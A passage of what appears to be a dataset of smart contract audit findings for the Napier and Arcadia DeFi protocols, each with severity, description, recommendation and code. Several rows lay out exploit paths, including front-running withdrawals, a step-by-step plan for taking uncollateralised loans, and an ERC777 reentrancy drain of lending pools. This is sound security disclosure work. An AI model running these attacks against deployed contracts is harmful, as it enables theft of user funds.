tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(""protocolFeePercent"", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, ""fee should be charged"");\\n }\\n```\\n" +Benign esfrxETH holders incur more loss than expected,medium,"Malicious esfrxETH holders can avoid ""pro-rated"" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancers submit a withdrawal request to withdraw staked ETH from FRAX, it will first reside in the mempool of the blockchain and anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once executed, the malicious esfrxETH deposits back to the adaptors.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.",The best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee upon depositing and withdrawing.,The rest of the esfrxETH holders incur more losses than expected compared to if malicious esfrxETH holders had not used this trick in the first place.,"```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n" +Lack of slippage control for `issue` function,medium,"The lack of slippage control for `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted is depending on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. For instance, the LIDO's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shared minted will vary (larger or smaller than expected) if there is a change in the current scale. Assuming that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks the slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n",Implement a slippage control that allows the users to revert if the amount of PT/YT they received is less than the amount they expected.,Loss of assets for the affected users.,"```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n" +Users unable to withdraw their funds due to FRAX admin action,medium,"FRAX admin action can lead to the fund of Naiper protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered ""RESTRICTED"". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join the FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim their ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }("""");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nFRAX admin could execute the `recoverEther` function to transfer out all the Native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }("""");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.",Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.,"The fund of Naiper protocol and its users will be stuck, resulting in users being unable to withdraw their assets.","```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n" +Users are unable to collect their yield if tranche is paused,medium,"Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, it stated that the admin/owner is ""RESTRICTED"". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. If a malicious admin paused the Tranche contract, the users will not be able to collect their yield earned, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\n",Consider allowing the users to collect yield even when the system is paused.,"Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.","```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n" +`swapUnderlyingForYt` revert due to rounding issues,medium,"The core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` allows users to swap underlying assets to a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLine 353-354 above compute the number of underlying deposits needed to send to the Tranche to issue the amount of YT token the users desired. It attempts to add a buffer of 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT\\n```\\nuDepositNoFee = cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nsahres = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 below of the `Tranche.issue` function will compute the number of PY+YT to be issued/minted\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT is issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\n","The buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again. Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.",The core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.,"```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n" +FRAX admin can adjust fee rate to harm Napier and its users,medium,"FRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered ""RESTRICTED"". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nFollowing is one of the ways that FRAX admin can harm Napier and its users.\\nFRAX admin can set the fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire amount of the staked fee, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: _redemptionQueueState.earlyExitFee\\n });\\n```\\n",Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.,Users unable to withdraw their assets. Loss of assets for the victim.,"```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n" +SFrxETHAdapter redemptionQueue waiting period can DOS adapter functions,medium,"The waiting period between `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol; the Queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is curently set to `1_296_000 Seconds` or 15 Days; as recently as January however it was at `1_555_200 Seconds` or `18 Days`. View current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. `bufferEth` is a facility which smooth running of redemptions and deposits.\\nFor redemptions; it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which are less than `bufferEth` will be rejected as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits; where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above it's target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield; making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\n",Consider adding a function allowing the rebalancer call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when there is a necessity. This will allow an immediate withdrawal for a fee of 0.5%; see function here,"If the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current, 15 Day waiting period. During the waiting period if `redemptions > deposits`, the `bufferEth` can be brought down to `0` which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too; if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to it's target level and not beyond and during the wait period there could be further redemptions.","```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n" +`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawing,high,"`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit are as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be it's own `owner`. Paired with a maliciously designed `creditor` (creditor can be set to anything) `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious. It can then abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.","The root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if `owner == address(this)`","Account can take out completely uncollateralized loans, causing massive losses to all lending pools.",```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n +Reentrancy in flashAction() allows draining liquidity pools,high,"It is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... \\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. However, if we deposit one more USDT token into the account, 